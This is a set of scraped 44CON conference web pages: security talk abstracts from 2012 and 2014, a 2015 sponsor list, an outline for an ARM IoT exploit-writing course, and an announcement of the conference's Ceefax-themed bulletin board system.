          Reverse engineering methods in hardware and software domains have been demonstrated to dump or model smart card operating system or on-card application source code. The hardware reverse engineering methods require specialized equipment and silicon level skills and are generally used by attackers to extract encryption keys or key derivation algorithms, which are not the topic of this talk. Instead, I will mainly use code reverse engineering of the vendor’s software development kit (SDK) and card-host communication analysis to document the card application file format and relevant runtime bytecode instructions, which can then be used to produce effective test cases targeting the interesting instructions of the on-card .NET virtual machine.


          Cryptanalysis of the Enigma Machine

          Presented by: Bob Weiss and Ben Gatti

          The Enigma machine was broken during WWII using an Electro Mechanical device and cribs (or known plaintext.)  A ciphertext only cryptanalysis method for breaking the Enigma was proposed by James Gillogly in 1995, but until now software to implement this type of attack has not been available.  We expect to release software that implements a modified version of what Gillogly proposed.


          DGA Detection & Optimization

          Presented by: Gunter Ollman

          The concept behind domain generation algorithm (DGA) use for locating crimeware C&C isn’t particularly new, however the current generation is considerably better tuned than those of old and is increasingly incorporated as a backup strategy to the more sophisticated commercial crimeware tools. For the good guys, there are new machine learning and advanced spectral clustering approaches that can automatically detect (passively at the network level) their operation and classify malware families. For the bad guys, there are improved operational methods that guarantee evasion – at both technological and law enforcement levels. This talk covers the state of the art in applying advanced machine learning to network detection, and the optimizations being made by the masterminds behind some of the best crimeware out there.


          Passive IPS Reconnaissance and Enumeration – false positive (ab)use

          Presented by: Arron Finnon

          Network Intrusion Prevention Systems or NIPS have been plagued by “False Positive” issues almost since their first deployment.  A “False Positive” could simply be described as incorrectly or mistakenly detecting a threat that is not real.  A large amount of research has gone into using “False Positive” as an attack vector either to attack the very validity of an IPS system or to conduct forms of Denial of Service attacks.  However the very reaction to a “False Positive” in the first place may very well reveal more detailed information about defences than you might well think.

          This talk takes a look at how it is possible to enumerate network defences such as an IPS by very simple and effective means.  A detection system such as an IPS reacting to a set of conditions under the control of an attacker can very well allow them to know what defences they need to overcome to be successful.  With a simple crafted email it is possible to tell that clamAV is running on a mail server, or a simple fake URL parameter could well inform you that SNORT is defending a web application.  Armed with this type of information an attacker can plan an attack that utilises IPS evasion techniques.  Although this talk uses some very famous “Open Source” security applications in its examples, the methodology can easily be used to detect a whole host of commercial security products as well.

          There is no hard and fast simple fix to the issues discussed in this talk, the aim is simple; to give the attendees the ability to spot and assess potential “reaction leakages” from a detection system.  You can only really defend against what you can understand and with this information a more fitting solution can be sought.


          Hardware security resilience to low-cost attacks

          Presented by: Sergei Skorobogatov

          With the growing concern about low-cost attacks on secure hardware there is a need for a better understanding of how those attacks work. Even when the information is encrypted, the determined attacker can learn the key through side-channel leakages or via fault injection attacks. I will present low-cost attack technologies which should be considered by hardware developers.

          Hardware assurance is another big area of concern for developers and consumers as modern semiconductor chips are complex enough to become vulnerable to malevolent activities in the form of Trojan and backdoor insertion. An adversary can introduce Trojans into the design during a stage of fabrication by modifying the mask at a foundry. It could also be done by third parties in the design blocks or by malicious insiders at the design house. My recent research demonstrates how such backdoors can be found using side-channel analysis techniques.


          I’m the butcher, would you like some BeEF?

          Presented by: Thomas Mackenzie, Michele Orru

          Recently a lot of focus in BeEF has been towards developing cool new features that help the day to day job of a social engineer, hereafter known as “The Butcher”.

          We have been working very hard and secretively in the last months to widen our range of meaty goods within the Browser Exploitation Framework. During this talk we will release new modules and extensions specifically aimed toward automating the technical parts of a social engineer attack.

          Employing techniques that are currently used is great, however “The Butcher” wishes to impart knowledge upon the attendees regarding new techniques that employ successful vectors targeting different browsers within different security contexts.

          After introducing people to the project who may have never heard of it before, we will be sharing information about real social engineering / penetration testing work that we have done recently and how we have advanced BeEF to achieve maximum coverage. This includes:

          • Website Cloning: but you haven’t seen it like this before!
          • Email Spoofing: mass email, easy
          • Browser Control / Pwnage Automation: control BeEF programmatically using the RESTful API
          • Maintaining Connectivity: you have met man in the middle, meet man in the browser

          2012 in review: Tor and the censorship arms race

          Presented by:  Runa A. Sandvik

          Kazakhstan blocked Tor using Deep Packet Inspection in January 2012. China started probing Tor bridges using a system that is aimed directly at Tor, and using code that actually speaks the Tor protocol. Iran started blocking SSL connections on Valentine’s Day, in preparation for its “halal” Internet. Mobile operators in the US and the UK continue to filter and censor websites for customers. The government in the UK proposed plans for mass surveillance. Activists in Iran and Syria were targeted with malware, and the government in Kuwait proposed plans to regulate the use of social networking sites.

          These are some of the Internet censorship events we have seen so far in 2012, and we have only scratched the surface. In this presentation,  I will talk about how the blocking is done (in terms of what signatures are filtered in Tor, and how we have gotten around the blocking in each case), and what technologies are being used to filter Internet traffic — including the use of Western technology to operate the surveillance and censorship infrastructure in the Middle East.

          I will cover what we have learned so far about the mindset of the censor, as well as the users being censored, and how we can measure and track the wide-scale censorship in these countries using a framework we have developed. Lastly, I will explain Tor’s development plans to continue to evade censorship and enable thousands of users around the world to access a free and open Internet.


          Post-Exploitation Tu-Dot-Oh!

          Presented  by: Rich Smith

          As the technology landscape evolves to embrace new paradigms & usage patterns, consideration must be given to the effects these changes have on the attack tooling and strategies used in the assessment of this dynamic environment. This presentation focuses on how approaches to post-exploitation can be altered to meet these changing technologies, along with the considerations those undertaking such attack assessments should be aware of.

          A novel proof of concept implant will be demonstrated and discussed to show how a number of currently used post-exploitation techniques can be improved upon to better provide the capabilities required for long term, complex attack engagements against today’s changing infrastructure.


          Security Testing 4G (LTE) Networks

          Presented by: Martyn Ruks, nils

          4G is here, or more accurately LTE implementations (another way of saying 4G) are being trialled and will be rolled out more widely in the UK in the near future. One of the changes in LTE networks is the use of IP for all communications between components, this improves scalability but does it also increase the risk of successful compromise? MWR have been working with a number of major players in this space and have gained significant experience in the technology, learning how it can be security tested and ultimately how it should be secured. This talk will provide an overview of the security of 4G networks and more importantly how they should be tested. From this talk the audience will take away a better understanding of LTE deployments, how they could be attacked and how we can gain assurances about their security.


          What the HEC? Security implications of HDMI Ethernet Channel and other related protocols

          Presented by: Andy Davis

          VGA is dead (or at least dying), long live HDMI! The VGA socket on the back of your PC is 25 years old and with new PCs and laptops we’re starting to see a change – to HDMI, but under the hood this brings many other capabilities than just displaying video.

          At Black Hat Europe 2012 I discussed the security of the EDID protocol which allows displays to communicate their capabilities to hosts over interfaces such as HDMI and VGA. I also touched on a number of other, very new HDMI-based protocols: CEC (Consumer Electronics Control) and HEC (HDMI Ethernet Channel). In this talk I will focus on the security of these protocols, how they will affect consumer network security and also their implications in the corporate world. I will also demonstrate a CEC security testing tool called CECSTeR.


          Malware analysis as a hobby

          Presented by:  Michael Boman, Siavosh Zarrasvand

          How can one with limited time and budget create an environment that analyses suspected sites and software for malicious behaviour at speed? For one thing you need to engineer yourself out of the equation, and this is how we did it.


          An Idiot Abroad

          Presented by: Don A. Bailey

          Travel seems less tedious and scary than ever before in history. We can sit in a temple thousands of years old in east Java while using Java to browse the Internet on our mobile phone. We can MMS photos of ourselves covered in painted spices during Holi in Bombay. But, what about how we feel about our environment beyond the phone and the laptop? Our environment is becoming more entwined with our technological presence. With Zigbee, Low Power Bluetooth, RFID, and NFC, we can integrate our preferred environmental preferences more and more in the modern world, from casinos in Las Vegas to five star villas in Singapore. But, what controls these systems? And how are they affected by security? And how can the security of these seemingly simple devices affect us? “An Idiot Abroad” will demonstrate how the components at the core of traffic control systems, IP cameras, security access units, and electrical control systems, are all affected by security weaknesses. The presenter will demonstrate how patterns can be detected in firmware where symbols and other compilation options are not necessarily present, which allow attackers or reverse engineers to find vulnerabilities and critical sections of code quickly and efficiently. Examples will be given of how to take a little known microcontroller and reverse engineer the firmware, in some cases without even having access to the instruction set. Then, the presenter will demonstrate how vulnerabilities in these simple devices can lead to interesting, and sometimes dangerous, exploits.


          Toppling Domino – Testing security in a Lotus Notes environment.

          Presented by: Darren Fuller

          Although there have been a number of technical papers published by different researchers covering Lotus Notes/Domino security it is rarely covered by the wider pen testing community.  In this presentation I’ll aim to give a general overview of Domino security and demonstrate ways of breaking in.  This will cover security issues from the point of view of the webserver, native Domino server and demonstrate some tricks you can use from the client side of things.


          PinPadPwn

          Presented by: nils, Rafael Dominguez Vega

          Pin Pads or Payment Terminals are widely used to accept payments from customers. These devices run Payment Applications on top of the device specific firmware. It should come as no surprise to anyone that these applications and operating systems are just as vulnerable as any other systems when it comes to handling user input.

          As the use of Chip and Pin continues to replace the fairly basic magnetic stripe cards, these devices are handling more and more complex information from untrusted sources; namely the EMV protocol spoken by all major payment smart-cards. On top of this many of these terminals are connected through Ethernet, GPRS, WiFi or phone lines, which add to the overall attack surface.

          We will demonstrate that memory corruption vulnerabilities in payment terminals and applications are a reality and that they can be used to gain code execution on the terminals. Furthermore we will demonstrate and discuss potential payloads and how these can profit an attacker.


          Surveillance cameras. The real-world has them everywhere, why not your computer?

          Presented by: Michael Viscuso

          There are hundreds if not thousands of real-time detection and prevention products on the market, all claiming to defend your assets against the most sophisticated attackers.  But the headlines uncover the truth… “75,000 Facebook passwords stolen”, “RSA hacked!”, “Criminals steal $6.7M in cyber bank heist”, “Zappos resets 24 million users’ passwords”. Each one of these companies had firewalls in place, up to date anti-virus signatures, the most sophisticated email filtering, etc.  What’s wrong?  Why are digital assets so hard to protect?

          This presentation will take a deeper look into “the hacker problem” – from a hacker’s perspective – and let you in on the secrets that will change your approach to security forever.

          There will be further updates – in addition there are still  Fast Track talks and the Workshops that will be happening during 44Con 2012  to be announced.

          Note: Talks are subject to change.

          #####EOF##### 44CON LONDON 2015 Sponsors – 44CON

          44CON LONDON 2015 Sponsors

          Platinum Sponsor
          NCC Group

          http://www.nccgroup.com

          NCC Group is a leading global information assurance company, providing freedom from doubt that all critical material is available, protected, and operating as it should be at all times. Information assurance is delivered through escrow and verification, security testing, audit and compliance, software testing and web performance services.

          Gold Sponsors
          MWR InfoSecurity

          http://www.mwrinfosecurity.com

          Established in 2003, MWR InfoSecurity is a research-led information security consultancy. MWR consults with clients around the world, providing specialist advice and services on all areas of security, from mobile through to supercomputers. As a company we invest heavily in knowledge sharing and we are proud to be a part of an event that provides a platform for discussion on the latest thinking and research in the InfoSec arena.

          Digital Shadows

          http://www.digitalshadows.com

          Digital Shadows provides cyber situational awareness that helps organizations protect against cyber attacks, loss of intellectual property, and loss of brand and reputational integrity. Its flagship solution, Digital Shadows SearchLight™, is a scalable and easy-to-use data analysis platform that provides a holistic view of an organization’s digital footprint and the profile of its attackers. It is complemented with security analyst expertise to ensure extensive coverage, tailored intelligence and frictionless deployment. The company is jointly headquartered in London and San Francisco.

          Context Information Security

          http://www.contextis.com

          Context is an independently operated cyber security consultancy, founded in 1998 and focusing on providing highly skilled consultants to help organisations with their information security challenges. We work with some of the world’s most high profile blue chip companies and government organisations.

          BAE Systems Applied Intelligence

          http://www.baesystems.com/home?r=ai

          BAE Systems Applied Intelligence delivers solutions which help our clients to protect and enhance their critical assets in the connected world. Our solutions combine large-scale data exploitation, ‘intelligence-grade’ security and complex services and solutions integration. We operate in four key domains of expertise: Cyber Security; Financial Crime; Communications Intelligence; and Digital Transformation.

          Silver Sponsors
          Raytheon|Websense

          http://www.websense.com/content/home.aspx

          Headquartered in Austin, TX, Raytheon|Websense is a leading provider of solutions to defend global industry and infrastructure against a rapidly growing level of sophisticated threats posed by well-funded adversaries and criminal networks. It enables commercial and government organisations to manage their cybersecurity risk through an advanced and integrated cybersecurity platform that protects critical data, wherever it resides, and gives actionable intelligence across the entire threat lifecycle.

          Microsoft

          http://www.microsoft.com/security

          Microsoft is proud to be a continuing sponsor of 44CON. We appreciate 44CON providing a unique forum in which security researchers from all over the world, IT Pros and industry luminaries can gather to share insights, knowledge and information to advance security research. Microsoft remains dedicated to software security and privacy and continues to collaborate with the community of people and technology organizations helping to protect customers and the broader ecosystem.

          BT

          http://www.bt.com/letstalk/security

          BT is one of the world’s leading providers of communications solutions and services operating in 170 countries. Its principal activities include networked IT services; local, national and international telecommunications services; higher-value broadband and internet products and services and converged fixed/mobile products and services.

          Black Duck Software

          https://www.blackducksoftware.com

          Black Duck solutions help security and development teams identify and mitigate open source related risks across an application portfolio. Black Duck is the only security solution that provides the industry’s most complete open source software KnowledgeBase and the most comprehensive language coverage and development-tools integration. With Black Duck, organizations can scan code to identify specific open source code in use and automatically map this code to industry-identified security vulnerabilities. Black Duck also empowers organizations to identify licenses and community activity, assess risk, and prioritize and track remediation efforts.

          Other Event Sponsors
          Tiger Scheme

          http://tigerscheme.org

          Tiger Scheme is an independent certification scheme that gives those commissioning security testing services confidence that they are hiring an individual or company that has been assessed to the highest standards. Tiger Scheme provides career progression through intermediate and senior level certification and technical specialist roles.

          CREST

          http://www.crest-approved.org

          CREST is a not-for-profit organisation that represents the technical information security industry, primarily penetration testing, cyber security incident response and security architecture services.

          CREST offers public and private sector organisations an assurance that the technical security advisors they appoint are competent, qualified and professional with current knowledge. It also ensures that the CREST member companies they engage with have the appropriate processes and controls in place to perform the services for which they have been appointed and protect sensitive client-based information.

          CheckSec

          http://www.checksec.com/

          Founded in 2011, CheckSec’s mission is to rid the security industry of inefficiency, so security teams can focus on what really matters. With this goal in mind, we created Canopy to bring standardisation and automation to security assessment delivery.

          Encription

          PenTest Partners

          http://www.pentestpartners.com

          Pen Test Partners LLP is a CHECK & CREST accredited pen testing company that is approved by the PCI Council to undertake card breach work as a PCI PFI. We investigate roughly half of all credit card data breaches in the UK, which provides us with excellent real-time threat intelligence, used to augment our testing. We are a limited liability partnership for a very good reason; being in a partnership means that our people are heavily invested in the company. It’s that employee ownership which inspires and drives the quality in what we do.

          Logically Secure

          http://www.cyber-cpr.com

          CyberCPR is a safe haven where Incident Managers, Analysts, Executives and support staff can plan and coordinate cyber incident remediation activities. Designed by seasoned IR professionals, CyberCPR is designed to support staff so they can work faster and more efficiently on all aspects of IR, thus reducing organisational risks and saving money.

          Event Partners
          Antipøde

          http://www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts; Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder, it became quickly apparent after moving to London, that the city was crying out for the simple things in life, like a good flat white.

          Our Raison d’être is simple – to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW Solutions

          http://www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides, a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

          #####EOF##### The ARM IoT Exploit Laboratory 2019 Edition – 44CON

          The ARM IoT Exploit Laboratory 2019 Edition

          Presented By: Saumil Shah

          ARM has emerged as the leading architecture in the Internet of Things (IoT) world. The all new ARM IoT Exploit Laboratory is a 3-day intermediate level class intended for students who want to take their exploit writing skills to the ARM platform. The class covers everything from an introduction to ARM assembly all the way to Return Oriented Programming (ROP) on ARM architectures. Our lab environment features hardware and virtual platforms for exploring exploit writing on ARM based Linux systems and IoT devices.

          The class concludes with an end-to-end “Firmware-To-Shell” hack, where we extract the firmware from a popular SoHo router and an IP Camera, build virtual environments to emulate and debug them, and then build exploits to gain a shell on the actual hardware devices.

          The 3 day course will take place on the 9th, 10th and 11th of September 2019 at the Novotel London West
          Cost is £ 1,950 (inc VAT). Buy your place in our shop now.

          Learning Objectives

          • Introduction to the ARM CPU architecture
          • Exploring ARM assembly language
          • Understanding how functions work in ARM
          • Debugging on ARM systems
          • Exploiting Stack Overflows on ARM
          • Writing ARM Shellcode from the ground up
          • Introduction to Return Oriented Programming
          • Bypassing exploit mitigation using ROP
          • Practical ARM ROP
          • An Introduction to extracting firmware from devices
          • Emulating and debugging a SoHo router’s firmware in a virtual environment
          • “Firmware-To-Shell” – exploiting an actual SoHo router
          • “Firmware-To-Shell” – exploiting an actual IP camera
          • The Lab environment is a mixture of physical ARM hardware and ARM virtual machines.

          Course Outline

          Day 1:

          • Introduction to the ARM CPU architecture
          • Exploring ARM assembly language
          • EXERCISE – Examples in ARM Assembly Language
          • Debugging on ARM systems
          • Understanding how functions work in ARM
          • Exploiting Stack Overflows on ARM
          • EXERCISE – ARM Stack Overflows

          Day 2:

          • Writing ARM Shellcode from the ground up
          • EXERCISE – Embedded Web Server exploit
          • Introduction to Exploit Mitigation Techniques (XN/DEP and ASLR)
          • Introduction to ARM Return Oriented Programming
          • Bypassing exploit mitigation on ARM using ROP
          • ARM ROP Tools
          • EXERCISE – Searching for ARM ROP Gadgets

          Day 3:

          • Practical ROP Chains on ARM
          • EXERCISE – Exploit featuring ARM ROP Chains
          • Bypassing ASLR
          • An Introduction to firmware extracting
          • Discovering an IoT device’s serial pins and extracting actual firmware via serial console
          • Emulating and debugging a SoHo router’s firmware in a virtual environment
          • EXERCISE – Attacking a DLINK DIR-880L ARM Router – from firmware to shell
          • EXERCISE – Attacking a Trivision ARM IP Camera – from firmware to shell

          Target Audience

          • Past x86 Exploit laboratory students who want to take their elite exploitation skills to the ARM platform.
          • Pentesters working on ARM embedded environments. (SoCs, IoT, etc)
          • Red Team members, who want to pen-test custom binaries and exploit custom built applications.
          • Bug Hunters, who want to write exploits for all the crashes they find.
          • Members of military or government cyberwarfare units.
          • Members of reverse engineering research teams.
          • People frustrated at software to the point they want to break it!

          Student Requirements

          • A conceptual understanding of how functions work in C programming
          • Knowledge of how a stack works, basic stack operations
          • Familiarity with debuggers (gdb, WinDBG, OllyDBG or equivalent)
          • Not be allergic to command line tools.
          • Have a working knowledge of shell scripts, cmd scripts or Perl or Python.
          • If none of the above apply, then enough patience to go through the pre-class tutorials.
          • SKILL LEVEL: INTERMEDIATE (leaning towards advanced)

          Pre-Class Tutorials:

          The following tutorials have been specially prepared to get students up to speed on essential concepts before coming to class.

          a) Operating Systems – A Primer
          http://www.slideshare.net/saumilshah/operating-systems-a-primer

          b) How Functions Work
          http://www.slideshare.net/saumilshah/how-functions-work-7776073

          c) Introduction to Debuggers
          http://www.slideshare.net/saumilshah/introduction-to-debuggers

          What to Bring

          • A working laptop (no Netbooks, no Tablets, no iPads)
          • Intel Core i3 (equivalent or superior) required
          • 8GB RAM required, at a minimum
          • Wireless network card
          • 40 GB free Hard disk space
          • If you’re using a new Macbook or Macbook Pro, please bring your dongle-kit!

          Software Requirements

          • Linux / Windows / Mac OS X desktop operating systems
          • VMWare Player / VMWare Workstation / VMWare Fusion MANDATORY
          • Administrator / root access MANDATORY

          Students will be provided with

          Students will be provided with all the lab images used in the class. The ARM IoT Exploit Laboratory uses a “Live Notes” system that provides a running transcript of the instructor’s system to all the students. Our lab environment, plus about 800MB of curated reading material, will be made available to all attendees to take with them and continue learning after the training ends.

          About the Trainer

          Lead Instruction – Saumil Shah @therealsaumil

          Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients around the globe. Saumil is an internationally recognised speaker and instructor, having regularly presented at conferences like Blackhat, RSA, CanSecWest, PacSec, EUSecWest, Hack.lu, Hack-in-the-box and others. He has authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil graduated with an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time breaking software, flying kites, traveling around the world and taking pictures.

          Instructor’s Contact Info:
          Saumil Udayan Shah
          CEO, Net-Square Solutions Pvt. Ltd.
          Twitter: @therealsaumil

          Book your 44CON 2019 training course now!


          Building A Permanent Community At 44CON

          44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

          To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

          In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

          Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:


          For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.

          Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.


          Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

           

           


          We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.


          44CON 2014 Presentations

          Chicken of the ‘APT’: Using Shadowlab Incubation for Targeted Attack Attribution

          Presented By: Kyle Wilhoit

          Attribution of attackers and motives is often difficult. Trying to understand what tactics they use, malware they utilize, and what groups they belong to can be a tedious task. These attackers are often targeting specific organizations, individuals, and countries, things that sandboxes and dynamic analysis techniques rarely have the ability to emulate. In this talk, we’ll cover targeted malware incubation and present two case studies of never released details on how attackers have fallen victim to incubation. The talk will finally finish with the release of an open source incubator, Shadowlab, giving everyone the ability to incubate malware.


          GreedyBTS: Hacking Adventures in GSM

          Presented By: Hacker Fantastic

          There are over 2.9 BILLION subscribers on GSM networks today. How many of these subscribers are susceptible to trivial attacks that can leave phone calls, text messages and web surfing habits accessible to an attacker? This talk intends to discuss the reasons why GSM networks are still vulnerable today and demonstrate attack tools that might make you re-think how you handle sensitive data via your phone. The presenter will discuss his own experience of analysing GSM environments and provide a demonstration of GreedyBTS which can be used to compromise a target’s phone calls, messaging and web surfing habits. Mobile Phones will be harmed during this presentation.


          Chopping Down Mountains

          Presented By: Don A. Bailey

          Most people thought the destruction of digital currency would come from vulnerabilities identified in the protocol or end-user software. The decentralized nature of the technology implies that there is no one vector for attacking Bitcoin, Dogecoin, and other currencies. However, there are much easier ways to kill a coin. The fall of Mt. Gox proved that centralization occurs in the exchange and other companies attempting to facilitate trade. Attacks against these exchanges and merchant payment systems can easily destroy not only a digital currency business, but the coin itself.

          In this presentation, the presenter will reveal undiscovered security risks that have not yet been disclosed or mitigated by digital exchanges. After explaining how these risks can cripple not only exchanges but the currencies themselves, the presenter will discuss the real and practical methods for solving these issues.

          Digital currency is an exciting revolution in the way wealth is distributed among worldwide populations. Solving the underlying security issues that hinder its widespread adoption may assist in enabling the distribution of wealth to the regions and individuals that need it most.

          To the moon!


          Researching Android Device Security with the Help of a Droid Army

          Presented By: Joshua J. Drake

          In the last few years, Android has become the world’s leading smart phone operating system. Unfortunately, the diversity and sheer number of devices in the ecosystem represent a significant challenge to security researchers. Primarily, auditing and exploit development efforts are less effective when focusing on a single device because each device is like a snowflake: unique.

          This presentation centers around the speaker’s approach to dealing with the Android diversity problem, which is often called “fragmentation”. To deal with the issue, Joshua created a heterogeneous cluster of Android devices. By examining and testing against multiple devices, you can discover similarities and differences between devices or families of devices. Such a cluster also enables quickly testing research findings or extracting specific information from each device.


          Social Engineering Your Own – Developing An Awareness Training Program That Actually Works

          Presented By: Valerie Thomas

          Organizations must establish an effective security awareness program. As security professionals we’ve likely heard (and said) it more times than we can count. But how often do we stop to think about what it actually means or how it can be implemented? The media is littered with reports of attacks, which emphasizes that it’s time to change the way we approach awareness training. It’s time to lose the never-changing slide deck and think outside the box. In this talk we’ll examine the art of influence at a group level and use social engineering to create positive change.


          What Did You Just Say To Me?

          Presented By: Jerry Gamblin

          Imagine you have to explain a newly discovered vulnerability in the human resources software your company uses to the director of human resources who forgets his password 3 times a week. How would you approach that talk?

          It takes many skills to be an effective security professional but arguably the most important trait for a security professional is the ability to communicate effectively. In this talk we will discuss the best methods to explain complex security issues to non-technical people and I will share the tools and tips I have used to become better at this.


          Flushing Away Preconceptions of Risk

          Presented By: Thom Langford

          Risk is often seen as a dirty word in business. It is a thing that needs to be reduced to nothing, and has no possible good use in an organization, especially a security programme.

          This couldn’t be more wrong! Risk is an inherent part of any business, and yet it is often poorly recognized and leveraged in the security organisation. In this presentation Thom will look at three areas of the risk conundrum to open the veil on the elusive art of understanding and ultimately measuring risk.


          Security Analytics Beyond Cyber

          Presented By: Phil Huggins

          A quick summary of the current state of big data technology and data science approaches used in cyber / network defender security analytics including summary use cases, a walk through of a reference architecture and breakdown of the required skills. Focus is on the knowledge needed to run a proof of concept and establish a programme for early benefits. Will then also include a view on the future of extending the platforms and capabilities of security analytics to cover performance metrics and data-driven security management approaches.


          Hot or not, the hacker way

          Presented By: Dan Tentler

          Thermal imaging has been a subject that not many people get the opportunity to research, without an exceedingly high number of dollars on the table. This pet project of mine began in 2010 when I asked FLIR for a demo unit to do a series of tests in an effort to see how infrared could be used in the world of information security. Their PR people replied to me saying that they didn’t think a FLIR device could be used to read heat signatures from a computer because they weren’t sensitive enough. This year I got my hands on a FLIR E4, and hacked it to have 4x the resolution. Boy was that PR guy wrong.

           


          Using Hadoop for Malware, Network, Forensics and Log analysis

          Presented By: Michael Boman

          The number of new malware samples is over a hundred thousand a day, network speeds are measured in multiples of ten gigabits per second, computer systems have terabytes of storage and the log files are just piling up. By using Hadoop you can tackle these problems in a whole different way, and “Too Much Data to Process” will be a thing of the past.


          I gave a talk about robots and hardware!

          Presented By: Josh Thomas

          “…and therein lies the Android problem…” Vendors, service providers, handset manufacturers, an insane number of different devices, patch stagnation, lack of updates, blah, blah, blah. We get it, and honestly it’s starting to be a tad boring. So why would you want to sit through yet another Android talk? You don’t, and I don’t want to give that talk anyway.

          Instead, let us spend some time talking about the roots of all smartphones: The hardware design, the system on chip internals, the problematic Linux kernels. Let’s chat about design reuse and how to take advantage of lazy electronic engineers. Let’s converse about generational design flaws and how they can be exploited. In short, let’s talk about breaking a bunch of expensive toys.

          This talk will cover multiple handset manufacturers’ internal PCB designs, a fair bit of Qualcomm exploration, some witty banter about the fossil-esque Linux kernel we drag about daily and probably some childish poking at the trusted boot process.


          Payment applications handle lots of money. No, really: lots of it.

          Presented By: Mark Swift & Alberto Revelli

          A medium-sized bank will funnel hundreds of billions through payment gateways every year. A larger one will easily be deep in ‘trillions’ territory. You work for a company with significant revenue? Chances are that your company shoves lots of money through one of these applications.

          Surprisingly, however, the security of these apps is often flaky: people who understand the business process rarely understand the technical risks. Vendors and consultants often recommend business-level defences but then make horrible technical mistakes, and very often the overall defence strategy boils down to “DBAs do not understand the business” comedy. When it comes to crypto, hilarity ensues: shared private keys and broken algorithms become the norm, with self-proclaimed “experts” proving to have problems with exotic concepts like “hash function” and “birthday paradox”, leading CISOs to a false sense of security that only makes things worse.

          Our presentation is a mix of attack and defence, combining descriptions of business-level and tech-level threats with crypto-based countermeasures. It is the result of a project we have been working on for the past year, with the goal of using crypto to secure our payment applications.

          The presentation will start by describing how payment applications work, what their workflow is, what a payment file “really looks like”, how it is created, handled and processed. We will then describe the attack surface of the whole process, how an employee in the right role can easily steal large amounts of money, and what checks and countermeasures he/she would need to bypass.

          In the second part of the presentation, we will then describe a real-world example of how to properly employ crypto (via an HSM-based infrastructure) to greatly reduce the risks, and how to integrate such a solution with existing applications. We will also include some examples of things that are easy to get wrong while designing the solution.


          10 GBP simple hardware side channel attacks

          Presented By: Joe FitzPatrick

          Most dismiss power side channel attacks as difficult, expensive and unlikely, and they are therefore out of scope for many security evaluations. Recent presentations have demonstrated how to get this cost down to a few hundred dollars using low-cost, high performance analog components alongside current high performance FPGAs.

          By simplifying both the target hardware and the analysis, I aim to present a series of simple examples of timing and power analysis attacks on microcontroller hardware that require no advanced math and can be done in the comfort of your home for less than $20 in parts.


          Manna from Heaven; Improving the state of wireless rogue AP attacks

          Presented By: Dominic White

          The current state of theoretical attacks against wireless networks should allow this wireless world to be fully subverted for all but some edge cases. Devices can be fooled into connecting to spoofed networks, authentication to wireless networks can either be cracked or intercepted, and our ability to capture credentials at a network level has long been established. Often, the most significant protection users have is hitting the right button on an error message they rarely understand. Worse for the user, these attacks can be repeated per wireless network allowing an attacker to target the weakest link.

          This combination of vulnerable and heavily used communications should mean that an attacker need just arrive at a location and set up for credentials and access to start dropping from the sky. However, the reality is far from this; karma attacks work poorly against modern devices, network authentication of the weakest sort defeats rogue APs and interception tools struggle to find useful details.

          This talk is the result of our efforts to bring rogue AP attacks into the modern age. The talk will provide details of our research into dramatically increasing the effectiveness of spoofing wireless networks, and the benefits of doing so (i.e. gaining access). It includes the release of a new rogue access point toolkit implementing this research.


          On Her Majesty’s Secret Service: GRX and a Spy Agency

          Presented By: Stephen Kho

          GPRS Roaming eXchange (GRX) has been in mainstream media recently as part of the high profile Edward Snowden revelations. The leaked documents indicated that the UK government’s intelligence organisation, Government Communications Headquarters (GCHQ), hacked the Belgian GRX provider, Belgacom International Carrier Services (BICS). They did this by targeting the GRX provider’s employees with the ultimate aim of gaining access to Belgacom’s Core GRX routers. Allegedly, GCHQ hacked the GRX routers in order to carry out man-in-the-middle “traffic sniffing” attacks against mobile users who are roaming with smartphones or other devices capable of handling data.


